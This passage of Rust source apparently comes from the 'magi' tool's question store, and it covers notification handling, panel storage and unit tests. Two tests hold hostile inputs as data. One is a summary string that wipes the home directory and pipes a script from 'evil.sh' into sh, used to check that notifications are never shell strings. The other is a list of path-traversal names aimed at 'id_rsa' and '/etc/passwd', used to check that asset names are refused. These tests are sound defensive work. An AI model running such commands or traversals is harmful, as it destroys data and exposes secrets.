1788 }
1789 let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1790 tracing::debug!(program = %program, args = ?argv, "notifying");
1791
1792 let mut child = tokio::process::Command::new(program);
1793 child.quiet();
1794 child
1795 .args(&argv)
1796 .stdin(std::process::Stdio::null())
1797 .kill_on_drop(true);
1800 let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1801 Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1802 Err(_) => bail!(
1803 "notification command `{program}` did not finish within {}s",
1804 NOTIFY_TIMEOUT.as_secs()
1805 ),
1806 };
1807 if !out.status.success() {
1808 let stderr = String::from_utf8_lossy(&out.stderr);
1809 let why = stderr
1810 .lines()
1811 .rev()
1812 .find(|l| !l.trim().is_empty())
1813 .unwrap_or("no output on stderr")
1814 .trim();
1815 bail!(
1816 "notification command `{program}` exited with {}: {why}",
1817 out.status
1818 );
1819 }
1820 Ok(())
1821}
1822
1823fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
1829 let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1830 let mut out = String::with_capacity(template.len());
1831 let mut rest = template;
1832 while let Some(at) = rest.find('{') {
1833 out.push_str(&rest[..at]);
1834 let tail = &rest[at..];
1835 match table.iter().find(|(token, _)| tail.starts_with(token)) {
1836 Some((token, value)) => {
1837 out.push_str(value);
1838 rest = &tail[token.len()..];
1839 }
1840 None => {
1841 out.push('{');
1843 rest = &tail[1..];
1844 }
1845 }
1846 }
1847 out.push_str(rest);
1848 out
1849}
1850
1851fn web_url() -> String {
1853 question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1854}
1855
1856fn question_url(base: &str) -> String {
1863 let base = base.trim().trim_end_matches('/');
1864 if base.is_empty() || base.contains('#') {
1865 return base.to_owned();
1866 }
1867 format!("{base}/#/questions")
1868}
1869
1870fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1875 let index = dir.join(PANEL_HTML);
1876 std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1877 for (name, src) in assets {
1878 let dst = dir.join(name);
1879 std::fs::copy(src, &dst)
1880 .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1881 }
1882 Ok(())
1883}
1884
1885fn clear_dir(path: &Path) -> Result<()> {
1890 match std::fs::remove_dir_all(path) {
1891 Ok(()) => Ok(()),
1892 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1893 Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1894 }
1895}
1896
1897fn read_path(path: &Path) -> Result<Question> {
1898 let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1899 let q: Question =
1900 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1901 if q.schema > SCHEMA {
1902 bail!(
1907 "question {} was written by a newer magi (schema {}, this build \
1908 only speaks up to {SCHEMA})",
1909 q.id,
1910 q.schema
1911 );
1912 }
1913 Ok(q)
1914}
1915
1916pub fn short_id(id: &str) -> &str {
1918 short(id)
1919}
1920
1921fn short(id: &str) -> &str {
1922 id.split('-').next_back().unwrap_or(id)
1923}
1924
1925fn new_id() -> String {
1926 let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1927 let seed = crate::rng::entropy();
1928 format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1929}
1930
1931#[cfg(test)]
1932mod tests {
1933 use super::*;
1934
1935 fn store() -> (tempfile::TempDir, Questions) {
1938 let dir = tempfile::tempdir().unwrap();
1939 let s = Questions::at(dir.path().join("questions"));
1940 (dir, s)
1941 }
1942
1943 #[test]
1944 fn run_names_task_only_for_task_questions() {
1945 for (node, want) in [
1946 (crate::conduct::NODE, true),
1947 (crate::triage::NODE, true),
1948 (crate::triage::DEPS_NODE, true),
1949 (crate::land::APPROVAL_NODE, false),
1950 (crate::bump::NOTICE_NODE, false),
1951 ("implement", false),
1952 ] {
1953 let mut q = choice_question();
1954 q.node = node.to_owned();
1955 assert_eq!(q.run_names_task(), want, "{node}");
1956 }
1957 }
1958
1959 #[test]
1960 fn deleting_a_run_stops_its_questions_asking() {
1961 let (_dir, store) = store();
1962
1963 let mut open_one = choice_question();
1964 store.put(&mut open_one).unwrap();
1965 let mut answered = free_question();
1966 answered
1967 .answer(Answer::Text("keep this".to_owned()))
1968 .unwrap();
1969 store.put(&mut answered).unwrap();
1970 let mut elsewhere = choice_question();
1971 elsewhere.run = "20260903-105039-3cbf".to_owned();
1972 store.put(&mut elsewhere).unwrap();
1973
1974 let n = store
1975 .abandon_for_run(&open_one.run, "run was deleted")
1976 .unwrap();
1977 assert_eq!(n, 1, "only the open question of that run");
1978
1979 let back = store.get(&open_one.id).unwrap();
1980 assert!(!back.status.open(), "it no longer asks for a decision");
1981 assert!(
1982 back.detail.contains("run was deleted"),
1983 "the operator can see why: {}",
1984 back.detail
1985 );
1986
1987 let kept = store.get(&answered.id).unwrap();
1988 assert_eq!(
1989 kept.status,
1990 QuestionStatus::Answered,
1991 "an answered question is a decision on record, not something to revoke"
1992 );
1993 assert!(
1994 store.get(&elsewhere.id).unwrap().status.open(),
1995 "another run's question is untouched"
1996 );
1997 assert!(store.open_for(&open_one.run).is_empty());
1998 }
1999
2000 #[test]
2001 fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
2002 let (_dir, store) = store();
2003 let mut q = choice_question();
2004 store.put(&mut q).unwrap();
2005
2006 let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
2008 assert_eq!(n, 0);
2009 assert!(store.get(&q.id).unwrap().status.open());
2010
2011 let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
2014 assert_eq!(n, 1);
2015 let back = store.get(&q.id).unwrap();
2016 assert!(!back.status.open());
2017 assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
2018
2019 assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
2021 }
2022
2023 fn choice_question() -> Question {
2024 Question::new(
2025 "20260902-201256-9fb7".to_owned(),
2026 "implement".to_owned(),
2027 "impl-A".to_owned(),
2028 "Which storage backend should the cache use?".to_owned(),
2029 "Both are already dependencies.".to_owned(),
2030 vec!["SQLite".to_owned(), "Redis".to_owned()],
2031 )
2032 }
2033
2034 fn free_question() -> Question {
2035 Question::new(
2036 "20260902-201256-9fb7".to_owned(),
2037 "review".to_owned(),
2038 "rev-1".to_owned(),
2039 "What should the error message say?".to_owned(),
2040 String::new(),
2041 Vec::new(),
2042 )
2043 }
2044
2045 fn quiet() -> config::Notify {
2047 config::Notify::default()
2048 }
2049
2050 #[test]
2051 fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
2052 let mut q = choice_question();
2056 q.id = "20260902-231501-ab12".to_owned();
2057 let open: serde_json::Value = serde_json::to_value(&q).unwrap();
2058 let keys: Vec<&str> = open
2062 .as_object()
2063 .unwrap()
2064 .keys()
2065 .map(String::as_str)
2066 .collect();
2067 assert_eq!(
2068 keys,
2069 [
2070 "actions",
2071 "answer",
2072 "answer_delivered",
2073 "answer_timeout",
2074 "answered_at",
2075 "asked_at",
2076 "assets",
2077 "choices",
2078 "consult",
2079 "cwd",
2080 "delivered_turns",
2081 "deputy",
2082 "detail",
2083 "id",
2084 "node",
2085 "panel",
2086 "run",
2087 "schema",
2088 "seat",
2089 "status",
2090 "summary",
2091 "thread",
2092 "waiter",
2093 ],
2094 "the on-disk field set is a contract with the front end"
2095 );
2096 assert_eq!(open["schema"], 7);
2097 assert_eq!(open["thread"], serde_json::json!([]));
2098 assert_eq!(open["id"], "20260902-231501-ab12");
2099 assert_eq!(open["run"], "20260902-201256-9fb7");
2100 assert_eq!(open["node"], "implement");
2101 assert_eq!(open["seat"], "impl-A");
2102 assert_eq!(open["status"], "open");
2103 assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
2104 assert_eq!(open["answered_at"], serde_json::Value::Null);
2105 assert_eq!(open["answer"], serde_json::Value::Null);
2106 let asked = open["asked_at"].as_str().unwrap();
2107 assert!(
2108 asked.ends_with('Z') && asked.contains('T'),
2109 "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
2110 );
2111
2112 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2114 let answered = serde_json::to_value(&q).unwrap();
2115 assert_eq!(answered["status"], "answered");
2116 assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
2117 assert!(answered["answered_at"].is_string());
2118
2119 let mut free = free_question();
2121 free.answer(Answer::Text("Say which file it was".to_owned()))
2122 .unwrap();
2123 assert_eq!(
2124 serde_json::to_value(&free).unwrap()["answer"],
2125 serde_json::json!({"text": "Say which file it was"})
2126 );
2127
2128 let body = serde_json::to_string(&q).unwrap();
2130 assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
2131 }
2132
2133 #[test]
2134 fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
2135 let mut unoffered = choice_question();
2138 let a = unoffered
2139 .answer(Answer::Choice("Postgres".to_owned()))
2140 .unwrap_err()
2141 .to_string();
2142
2143 let mut typed = choice_question();
2144 let b = typed
2145 .answer(Answer::Text("use Postgres".to_owned()))
2146 .unwrap_err()
2147 .to_string();
2148
2149 let mut blank = free_question();
2150 let c = blank
2151 .answer(Answer::Text(" \n".to_owned()))
2152 .unwrap_err()
2153 .to_string();
2154
2155 let mut twice = choice_question();
2156 twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2157 let d = twice
2158 .answer(Answer::Choice("Redis".to_owned()))
2159 .unwrap_err()
2160 .to_string();
2161
2162 assert!(a.contains("not one of the choices"), "{a}");
2163 assert!(b.contains("multiple choice"), "{b}");
2164 assert!(c.contains("empty"), "{c}");
2165 assert!(d.contains("already answered"), "{d}");
2166 let mut distinct = vec![a, b, c, d];
2167 let asked = distinct.len();
2168 distinct.sort_unstable();
2169 distinct.dedup();
2170 assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
2171
2172 assert_eq!(unoffered.status, QuestionStatus::Open);
2174 assert_eq!(typed.status, QuestionStatus::Open);
2175 assert_eq!(blank.status, QuestionStatus::Open);
2176 assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
2178
2179 let mut free = free_question();
2181 let e = free
2182 .answer(Answer::Choice("SQLite".to_owned()))
2183 .unwrap_err()
2184 .to_string();
2185 assert!(e.contains("free text"), "{e}");
2186 }
2187
2188 #[test]
2189 fn open_questions_are_listed_before_answered_ones() {
2190 let (_dir, s) = store();
2191 let mut old_open = choice_question();
2194 old_open.id = "20260101-000001-aaaa".to_owned();
2195 let mut new_open = choice_question();
2196 new_open.id = "20260101-000002-bbbb".to_owned();
2197 let mut answered = choice_question();
2198 answered.id = "20260101-000003-cccc".to_owned();
2199 answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
2200 for q in [&mut old_open, &mut new_open, &mut answered] {
2201 s.put(q).unwrap();
2202 }
2203
2204 let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
2205 assert_eq!(
2206 ids,
2207 [
2208 "20260101-000002-bbbb",
2209 "20260101-000001-aaaa",
2210 "20260101-000003-cccc"
2211 ],
2212 "what has stopped work comes first; history sorts underneath"
2213 );
2214 assert_eq!(s.count_open(), 2);
2215 assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
2216 assert!(s.open_for("some-other-run").is_empty());
2217 assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
2219 assert!(s.get("20260101-000002-bbbb").is_ok());
2220 assert!(s.resolve_id("nope").is_err());
2221 assert!(
2222 s.revision() > 0,
2223 "the store's mtime drives the phone's polling"
2224 );
2225 }
2226
2227 #[test]
2228 fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
2229 let (_dir, s) = store();
2230 let mut good = choice_question();
2231 s.put(&mut good).unwrap();
2232 std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
2234 let future = serde_json::json!({
2235 "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
2236 "seat": "s", "summary": "?", "detail": "", "choices": [],
2237 "status": "open", "asked_at": "2026-01-01T00:00:00Z",
2238 "answered_at": null, "answer": null,
2239 });
2240 std::fs::write(
2241 s.path_of("20260101-000010-beef"),
2242 serde_json::to_string(&future).unwrap(),
2243 )
2244 .unwrap();
2245
2246 let listed = s.list();
2247 assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
2248 assert_eq!(listed[0].id, good.id);
2249 let e = s.get("20260101-000010-beef").unwrap_err().to_string();
2251 assert!(e.contains("schema"), "{e}");
2252 }
2253
2254 #[tokio::test]
2255 async fn the_wait_returns_the_answer_another_process_wrote() {
2256 let (dir, s) = store();
2261 let mut q = choice_question();
2262 let id = q.id.clone();
2263 let writer = Questions::at(dir.path().join("questions"));
2264 let handle = tokio::spawn(async move {
2265 tokio::time::sleep(Duration::from_millis(30)).await;
2266 let mut fresh = writer.get(&id).expect("the question was filed first");
2267 fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2268 writer.put(&mut fresh).unwrap();
2269 });
2270
2271 let got = wait_for_owner(
2272 &mut q,
2273 &s,
2274 &quiet(),
2275 Duration::from_secs(5),
2276 Duration::from_millis(10),
2277 )
2278 .await
2279 .unwrap();
2280
2281 handle.await.unwrap();
2282 assert_eq!(got, Wait::Answered("SQLite".to_owned()));
2283 assert_eq!(
2284 q.status,
2285 QuestionStatus::Answered,
2286 "the caller's copy is refreshed from the answering process's record"
2287 );
2288 assert!(q.answered_at.is_some());
2289 }
2290
2291 #[tokio::test]
2292 async fn a_question_nobody_answers_is_abandoned_not_deleted() {
2293 let (_dir, s) = store();
2294 let mut q = choice_question();
2295
2296 let got = wait_for_owner(
2297 &mut q,
2298 &s,
2299 &quiet(),
2300 Duration::from_millis(60),
2301 Duration::from_millis(10),
2302 )
2303 .await
2304 .unwrap();
2305
2306 assert_eq!(
2307 got,
2308 Wait::Abandoned,
2309 "a slow human is not an error; the run parks"
2310 );
2311 assert_eq!(q.status, QuestionStatus::Abandoned);
2312 let on_disk = s.get(&q.id).expect("the record of what was asked survives");
2313 assert_eq!(on_disk.status, QuestionStatus::Abandoned);
2314 assert!(
2315 on_disk.detail.contains("Abandoned:"),
2316 "why nobody answered belongs with the question: {}",
2317 on_disk.detail
2318 );
2319 assert!(on_disk.resolution().is_none());
2320 assert_eq!(s.count_open(), 0);
2321 }
2322
2323 #[tokio::test]
2324 async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
2325 let (_dir, s) = store();
2330 let mut q = choice_question();
2331 s.put(&mut q).unwrap();
2332
2333 let got = wait_loop(
2334 &mut q,
2335 &s,
2336 Duration::from_secs(3600),
2337 Duration::from_millis(30),
2338 Duration::from_millis(10),
2339 )
2340 .await
2341 .unwrap();
2342
2343 assert_eq!(
2344 got,
2345 Wait::Pending,
2346 "the clock on this call ran out, not the owner's patience"
2347 );
2348 assert_eq!(
2349 q.status,
2350 QuestionStatus::Open,
2351 "a slice expiring must never abandon the question"
2352 );
2353 let on_disk = s.get(&q.id).expect("still on disk, still open");
2354 assert_eq!(
2355 on_disk.status,
2356 QuestionStatus::Open,
2357 "nothing about the record changed just because this call gave up"
2358 );
2359 }
2360
2361 #[tokio::test]
2362 async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
2363 let (dir, s) = store();
2368 let mut q = choice_question();
2369 s.put(&mut q).unwrap();
2370
2371 let first = wait_loop(
2372 &mut q,
2373 &s,
2374 Duration::from_secs(3600),
2375 Duration::from_millis(30),
2376 Duration::from_millis(10),
2377 )
2378 .await
2379 .unwrap();
2380 assert_eq!(first, Wait::Pending);
2381
2382 let id = q.id.clone();
2383 let writer = Questions::at(dir.path().join("questions"));
2384 let mut fresh = writer.get(&id).unwrap();
2385 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2386 writer.put(&mut fresh).unwrap();
2387
2388 let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2393 .await
2394 .unwrap();
2395 assert_eq!(second, Wait::Answered("Redis".to_owned()));
2396 assert_eq!(q.status, QuestionStatus::Answered);
2397 }
2398
2399 #[tokio::test]
2400 async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2401 let (dir, s) = store();
2411 let mut q = choice_question();
2412 s.put(&mut q).unwrap();
2413
2414 let first = wait_loop(
2415 &mut q,
2416 &s,
2417 Duration::from_secs(3600),
2418 Duration::from_millis(30),
2419 Duration::from_millis(10),
2420 )
2421 .await
2422 .unwrap();
2423 assert_eq!(first, Wait::Pending);
2424
2425 let id = q.id.clone();
2427 let writer = Questions::at(dir.path().join("questions"));
2428 let mut fresh = writer.get(&id).unwrap();
2429 fresh.say("why not Postgres?").unwrap();
2430 writer.put(&mut fresh).unwrap();
2431
2432 let mut resumed = s.get(&id).unwrap();
2436 let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2437 .await
2438 .unwrap();
2439 assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2440 assert_eq!(
2441 resumed.status,
2442 QuestionStatus::Open,
2443 "talking back is not a decision; the question stays open"
2444 );
2445 }
2446
2447 #[tokio::test]
2448 async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2449 let (dir, s) = store();
2453 let broken = config::Notify {
2454 command: vec![
2455 "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2456 "{summary}".to_owned(),
2457 ],
2458 };
2459 let mut q = choice_question();
2460 assert!(
2461 notify(&broken, &q).await.is_err(),
2462 "the caller is told; it decides that it does not matter"
2463 );
2464
2465 let id = q.id.clone();
2466 let writer = Questions::at(dir.path().join("questions"));
2467 let handle = tokio::spawn(async move {
2468 tokio::time::sleep(Duration::from_millis(30)).await;
2469 let mut fresh = writer.get(&id).unwrap();
2470 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2471 writer.put(&mut fresh).unwrap();
2472 });
2473 let got = wait_for_owner(
2474 &mut q,
2475 &s,
2476 &broken,
2477 Duration::from_secs(5),
2478 Duration::from_millis(10),
2479 )
2480 .await
2481 .unwrap();
2482 handle.await.unwrap();
2483 assert_eq!(got, Wait::Answered("Redis".to_owned()));
2484
2485 assert!(notify(&quiet(), &q).await.is_ok());
2487 assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2488 }
2489
2490 #[test]
2491 fn notification_arguments_are_substituted_and_never_a_shell_string() {
2492 let mut q = choice_question();
2493 q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2494 let template = [
2495 "ntfy".to_owned(),
2496 "publish".to_owned(),
2497 "--click".to_owned(),
2498 "{url}".to_owned(),
2499 "--title".to_owned(),
2500 "magi {run} needs you".to_owned(),
2501 "{summary}".to_owned(),
2502 ];
2503 let argv: Vec<String> = template
2504 .iter()
2505 .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2506 .collect();
2507
2508 assert_eq!(
2509 argv,
2510 [
2511 "ntfy",
2512 "publish",
2513 "--click",
2514 "http://100.64.0.1:7777/#/questions",
2515 "--title",
2516 "magi 20260902-201256-9fb7 needs you",
2517 "; rm -rf ~ && curl evil.sh | sh #",
2518 ],
2519 "the shell metacharacters are one argument's contents, not syntax"
2520 );
2521
2522 q.summary = "should {url} be configurable?".to_owned();
2525 assert_eq!(
2526 expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2527 "should {url} be configurable?"
2528 );
2529 assert_eq!(
2531 expand("{title}: {run}", &q.run, &q.summary, ""),
2532 "{title}: 20260902-201256-9fb7"
2533 );
2534 assert_eq!(
2535 expand("no placeholders", &q.run, &q.summary, "http://x"),
2536 "no placeholders"
2537 );
2538 }
2539
2540 #[test]
2541 fn the_notification_link_lands_on_the_view_that_can_answer() {
2542 assert_eq!(
2543 question_url("http://100.64.0.1:7777"),
2544 "http://100.64.0.1:7777/#/questions"
2545 );
2546 assert_eq!(
2547 question_url("http://100.64.0.1:7777/"),
2548 "http://100.64.0.1:7777/#/questions"
2549 );
2550 assert_eq!(
2552 question_url("http://magi.ts.net/#/runs"),
2553 "http://magi.ts.net/#/runs"
2554 );
2555 assert_eq!(question_url(" "), "");
2557 }
2558
2559 fn panelled() -> Question {
2561 let mut q = choice_question();
2562 q.id = "20260903-014455-ab12".to_owned();
2563 q
2564 }
2565
2566 #[test]
2567 fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2568 let (dir, s) = store();
2569 let work = dir.path().join("worktree");
2570 std::fs::create_dir_all(&work).unwrap();
2571 std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2572 std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2573
2574 let mut q = panelled();
2575 let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2576 s.put_panel(
2577 &mut q,
2578 html,
2579 &[work.join("table.png"), work.join("diff.svg")],
2580 )
2581 .unwrap();
2582 s.put(&mut q).unwrap();
2583
2584 assert!(q.panel);
2585 assert_eq!(
2586 q.assets,
2587 ["diff.svg", "table.png"],
2588 "sorted, not in the order the agent happened to pass them"
2589 );
2590 assert_eq!(
2591 s.panel_html(&q.id).as_deref(),
2592 Some(html),
2593 "the html is stored byte for byte; the agent authored the markup"
2594 );
2595 assert_eq!(
2596 s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2597 Some(&b"<svg/>"[..])
2598 );
2599
2600 let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2602 let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2603 assert_eq!(json["panel"], true);
2604 assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2605 let back = s.get(&q.id).unwrap();
2606 assert!(back.panel);
2607 assert_eq!(back.assets, q.assets);
2608
2609 std::fs::remove_dir_all(&work).unwrap();
2612 assert_eq!(
2613 s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2614 Some(&b"\x89PNG"[..]),
2615 "a referenced asset would be gone with the worktree"
2616 );
2617 }
2618
2619 #[test]
2620 fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2621 let (dir, s) = store();
2622 let mut q = panelled();
2623 s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2624 s.put(&mut q).unwrap();
2625
2626 let secret = "this must never reach the browser";
2629 std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2630 assert_eq!(
2631 std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2632 secret,
2633 "the traversal is real: the operating system resolves this path \
2634 happily, which is why the name has to be refused before the join"
2635 );
2636
2637 let long = "x".repeat(200);
2638 for name in [
2639 "..",
2640 "../id_rsa",
2641 "..\\id_rsa",
2642 "sub/../id_rsa",
2643 "/",
2644 "\\",
2645 "/etc/passwd",
2646 "C:\\Windows\\win.ini",
2647 "",
2648 ".hidden",
2649 ".",
2650 long.as_str(),
2651 ] {
2652 assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2653 let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2654 assert!(
2655 e.contains("not a panel file name"),
2656 "`{name}` must be refused as a name, not attempted: {e}"
2657 );
2658 assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2659 }
2660 assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2663
2664 let hidden = dir.path().join(".hidden");
2667 std::fs::write(&hidden, "x").unwrap();
2668 let e = s
2669 .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2670 .unwrap_err()
2671 .to_string();
2672 assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2673 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2674 assert!(q.assets.is_empty());
2675 }
2676
2677 #[test]
2678 fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2679 let (dir, s) = store();
2680 let mut q = panelled();
2681 s.put(&mut q).unwrap();
2682
2683 let big = dir.path().join("recording.png");
2686 std::fs::File::create(&big)
2687 .unwrap()
2688 .set_len(PANEL_MAX_BYTES)
2689 .unwrap();
2690
2691 let html = "<p>see the recording</p>";
2692 let total = PANEL_MAX_BYTES + html.len() as u64;
2693 let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2694 assert!(
2695 e.contains(&PANEL_MAX_BYTES.to_string()),
2696 "the cap is named so the agent knows the limit: {e}"
2697 );
2698 assert!(
2699 e.contains(&total.to_string()),
2700 "the actual size is named so the agent knows by how much: {e}"
2701 );
2702
2703 assert!(!q.panel);
2704 assert!(q.assets.is_empty());
2705 let left: Vec<String> = std::fs::read_dir(s.root())
2706 .unwrap()
2707 .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2708 .collect();
2709 assert_eq!(
2710 left,
2711 [format!("{}.json", q.id)],
2712 "a refused panel leaves neither a directory nor scratch: {left:?}"
2713 );
2714 }
2715
2716 #[test]
2717 fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2718 let (dir, s) = store();
2719 let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2720 std::fs::create_dir_all(&before).unwrap();
2721 std::fs::create_dir_all(&after).unwrap();
2722 std::fs::write(before.join("diff.png"), "before").unwrap();
2723 std::fs::write(after.join("diff.png"), "after").unwrap();
2724
2725 let mut q = panelled();
2726 let e = s
2727 .put_panel(
2728 &mut q,
2729 "<p>x</p>",
2730 &[before.join("diff.png"), after.join("diff.png")],
2731 )
2732 .unwrap_err()
2733 .to_string();
2734 assert!(e.contains("diff.png"), "{e}");
2735 assert!(
2736 e.contains("before") && e.contains("after"),
2737 "both sources are named, because the fix is to rename one: {e}"
2738 );
2739 assert!(!q.panel);
2740 assert!(!s.panel_dir(&q.id).exists());
2741 }
2742
2743 #[test]
2744 fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2745 let (dir, s) = store();
2746 std::fs::write(dir.path().join("old.png"), "old").unwrap();
2747 std::fs::write(dir.path().join("new.png"), "new").unwrap();
2748
2749 let mut q = panelled();
2750 s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2751 .unwrap();
2752 s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2753 .unwrap();
2754
2755 assert_eq!(q.assets, ["new.png"]);
2756 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2757 assert!(
2758 s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2759 "an asset from the first attempt would show a mix of two answers"
2760 );
2761
2762 s.drop_panel(&q.id).unwrap();
2763 assert!(s.panel_html(&q.id).is_none());
2764 assert!(!s.panel_dir(&q.id).exists());
2765 s.drop_panel(&q.id)
2766 .expect("dropping a panel that is already gone is the desired state");
2767 }
2768
2769 #[test]
2770 fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2771 let (_dir, s) = store();
2772 let mut q = panelled();
2773 s.put(&mut q).unwrap();
2774
2775 assert!(!q.panel);
2776 assert!(s.panel_html(&q.id).is_none());
2777 assert!(
2778 s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2779 "a missing file is a 404 for the caller, not a failure of the store"
2780 );
2781 let json = serde_json::to_value(&q).unwrap();
2782 assert_eq!(json["panel"], false);
2783 assert_eq!(json["assets"], serde_json::json!([]));
2784
2785 let e = s.put_panel(&mut q, " \n", &[]).unwrap_err().to_string();
2788 assert!(e.contains("empty panel"), "{e}");
2789 assert!(!s.panel_dir(&q.id).exists());
2790 }
2791
2792 #[test]
2793 fn a_question_written_before_panels_existed_still_deserialises() {
2794 let (_dir, s) = store();
2795 std::fs::create_dir_all(s.root()).unwrap();
2796 let id = "20260902-231501-ab12";
2797 let body = r#"{
2799 "schema": 1,
2800 "id": "20260902-231501-ab12",
2801 "run": "20260902-201256-9fb7",
2802 "node": "implement",
2803 "seat": "impl-A",
2804 "summary": "Which storage backend should the cache use?",
2805 "detail": "Both are already dependencies.",
2806 "choices": ["SQLite", "Redis"],
2807 "status": "open",
2808 "asked_at": "2026-09-02T23:15:01Z",
2809 "answered_at": null,
2810 "answer": null
2811}"#;
2812 std::fs::write(s.path_of(id), body).unwrap();
2813
2814 let q = s.get(id).unwrap();
2815 assert!(
2816 !q.panel,
2817 "an absent field means no panel, not a parse error"
2818 );
2819 assert!(q.assets.is_empty());
2820 assert_eq!(q.schema, 1);
2825 assert!(q.thread.is_empty());
2826 assert_eq!(
2827 q.answer_timeout, 0,
2828 "an absent field means unrecorded, not a zero-second deadline"
2829 );
2830 assert!(!q.waiting_on_agent());
2831 assert_eq!(q.summary, "Which storage backend should the cache use?");
2832 assert_eq!(
2833 s.list().len(),
2834 1,
2835 "and it is still listed; skipping it would hide an open question"
2836 );
2837 }
2838
2839 fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2840 Turn {
2841 who,
2842 body: body.to_owned(),
2843 at,
2844 note: None,
2845 }
2846 }
2847
2848 #[test]
2849 fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2850 let mut q = choice_question();
2853 q.thread
2854 .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2855 let value = serde_json::to_value(&q.thread[0]).unwrap();
2856 let mut keys: Vec<&str> = value
2857 .as_object()
2858 .unwrap()
2859 .keys()
2860 .map(String::as_str)
2861 .collect();
2862 keys.sort_unstable();
2863 assert_eq!(keys, ["at", "body", "who"]);
2864 assert_eq!(value["who"], "operator");
2865 assert_eq!(value["body"], "why not Postgres?");
2866
2867 let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2868 let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2869 assert_eq!(parsed.who, Who::Agent);
2870 }
2871
2872 fn approval_question() -> Question {
2873 let mut q = Question::new(
